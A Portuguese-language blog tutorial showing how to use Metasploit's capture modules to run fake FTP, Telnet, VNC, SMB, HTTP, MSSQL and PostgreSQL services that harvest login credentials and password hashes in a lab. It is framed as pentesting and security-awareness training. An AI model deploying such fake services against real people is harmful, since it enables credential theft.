O msfconsole possui um módulo auxiliar que permite que você inicie serviços tais como: FTP, Telnet, VNC, SMB, HTTP, MSSQL, PostgreSQL, entre outros e obter as credenciais que são informadas durante o acesso. Pode ser um recurso interessante para ser utilizado durante o PenTest e/ou ate mesmo para conscientização de segurança.

🔑 FTP

Inicie o msfconsole utilizando o módulo auxiliar do ftp:

Linux
msfconsole

msf6 > use auxiliary/server/capture/ftp

msf6 auxiliary(server/capture/ftp) > set srvhost 192.168.0.100
srvhost => 192.168.0.100

msf6 auxiliary(server/capture/ftp) > set banner Bem vindo ao servidor FTP
banner => Bem vindo ao servidor FTP

msf6 auxiliary(server/capture/ftp) > exploit

Utilize o nmap para confirmar se a porta 21 está aberta.

Linux
nmap -p21 192.168.0.100

Tente realizar a conexão ao serviço ftp informando um usuário e uma senha.

O objetivo é apenas capturar os dados informados mesmo que estes não estejam corretos.

Linux
ftp 192.168.0.100

Dados coletados:

  • Usuário: marcos
  • Senhas: 100security

🔑 Telnet

Utilizando o módulo auxiliar do Telnet:

Linux
msf6 > use auxiliary/server/capture/telnet

msf6 auxiliary(server/capture/telnet) > set banner Bem vindo ao servidor Telnet
banner => Bem vindo ao servidor Telnet

msf6 auxiliary(server/capture/telnet) > set srvhost 192.168.0.100
srvhost => 192.168.0.100

msf6 auxiliary(server/capture/telnet) > exploit

Utilize o nmap para confirmar se a porta 23 está aberta.

Linux
nmap -p23 192.168.0.100

Tente realizar a conexão ao serviço telnet informando um usuário e uma senha.

O objetivo é apenas capturar os dados informados mesmo que estes não estejam corretos.

Linux
telnet 192.168.0.100

Dados coletados:

  • Usuário: marcos
  • Senhas: 100security

🔑 VNC

Utilizando o módulo auxiliar do VNC:

Linux
msf6 > use auxiliary/server/capture/vnc

msf6 auxiliary(server/capture/vnc) > set srvhost 192.168.0.100
srvhost => 192.168.0.100

msf6 auxiliary(server/capture/vnc) > exploit

Utilize o nmap para confirmar se a porta 5900 está aberta.

Linux
nmap -p5900 192.168.0.100

Tente realizar a conexão ao serviço vnc informando a senha.

O objetivo é apenas capturar a senha mesmo que esta não esteja correta.

Linux
vncviewer 192.168.0.100

Dados coletados:

  • Hash da Senha

🔑 SMB

Utilizando o módulo auxiliar do SMB:

Linux
msf6 > use auxiliary/server/capture/smb

msf6 auxiliary(server/capture/smb) > set srvhost 192.168.0.100
srvhost => 192.168.0.100

msf6 auxiliary(server/capture/smb) > exploit

Utilize o nmap para confirmar se a porta 445 está aberta.

Linux
nmap -p445 192.168.0.100

Tente realizar a conexão via UNC.

Windows
\\192.168.0.100

Informe o usuário e senha :


Dados coletados:

  • Hash da Senha

🔑 HTTP

Utilizando o módulo auxiliar do HTTP:

Linux
msf6 > use auxiliary/server/capture/http_basic

msf6 auxiliary(server/capture/http_basic) > set RedirectURL fake
RedirectURL => fake

msf6 auxiliary(server/capture/http_basic) > set srvhost 192.168.0.100
srvhost => 192.168.0.100

msf6 auxiliary(server/capture/http_basic) > set uripath admin
uripath => admin

msf6 auxiliary(server/capture/http_basic) > exploit

Utilize o browser para acessar a página e em seguida informe um usuário e uma senha.

Navegador
http://192.168.0.100/admin

Dados coletados:

  • Usuário: marcos
  • Senhas: 100security

🔑 MSSQL

Utilizando o módulo auxiliar do MSSQL:

Linux
msf6 > use auxiliary/server/capture/mssql

msf6 auxiliary(server/capture/mssql) > set srvhost 192.168.0.100
srvhost => 192.168.0.100

msf6 auxiliary(server/capture/mssql) > exploit

Utilize o nmap para confirmar se a porta 1433 está aberta.

Linux
nmap -p1433 192.168.0.100

Utilize um client para realizar a conexão com o banco de dados, neste exemplo utilizei o DBeaver


Dados coletados:

  • Usuário: root
  • Hash da Senha

🔑 PostgreSQL

Utilizando o módulo auxiliar do PostgreSQL:

Linux
msf6 > use auxiliary/server/capture/postgresql

msf6 auxiliary(server/capture/postgresql) > set srvhost 192.168.0.100
srvhost => 192.168.0.100

msf6 auxiliary(server/capture/postgresql) > exploit

Utilize o nmap para confirmar se a porta 5432 está aberta.

Linux
nmap -p5432 192.168.0.100

Utilize um client para realizar a conexão com o banco de dados, neste exemplo utilizei o DBeaver


Dados coletados:

  • Usuário: postgresql
  • Senhas: 100security

👍 Se este artigo te ajudou compartilhe!



  Autor

Marcos Henrique

 São Paulo/SP



  Ataques de Senhas

© 2024 - 100SECURITY

Contato